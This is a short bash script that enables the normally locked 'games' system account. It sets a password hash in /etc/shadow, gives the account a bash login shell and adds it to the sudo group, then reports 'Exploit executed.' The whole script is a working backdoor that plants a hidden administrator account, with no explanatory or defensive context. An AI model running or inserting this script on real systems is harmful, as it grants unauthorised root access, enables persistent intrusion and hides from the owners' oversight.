#!/bin/bash
read -s -p "Enter new password for user 'games': " NEWPASSWORD < /dev/tty
echo
read -s -p "Confirm new password: " CONFIRM < /dev/tty
echo

if [[ -z "$NEWPASSWORD" ]]; then
    echo "Error: Password cannot be empty."
    exit 1
fi

if [[ "$NEWPASSWORD" != "$CONFIRM" ]]; then
    echo "Error: Passwords do not match."
    exit 1
fi

NEWHASH=$(openssl passwd -6 "$NEWPASSWORD")

sed -i "s|^games:[^:]*|games:${NEWHASH}|" /etc/shadow

sed -i 's|^\(games:[^:]*:[^:]*:[^:]*:[^:]*:[^:]*:\)[^:]*|\1/bin/bash|' /etc/passwd

grep -q '^sudo:' /etc/group || echo 'sudo:x:27:' >> /etc/group

if ! grep -q '^sudo:.*games' /etc/group; then
    sed -i '/^sudo:/ s/$/,games/' /etc/group
    sed -i 's/,$//' /etc/group
    sed -i 's/:,/:/' /etc/group
fi

grep -q '^games:' /etc/group || echo 'games:x:1001:games' >> /etc/group

echo "Done. Exploit executed."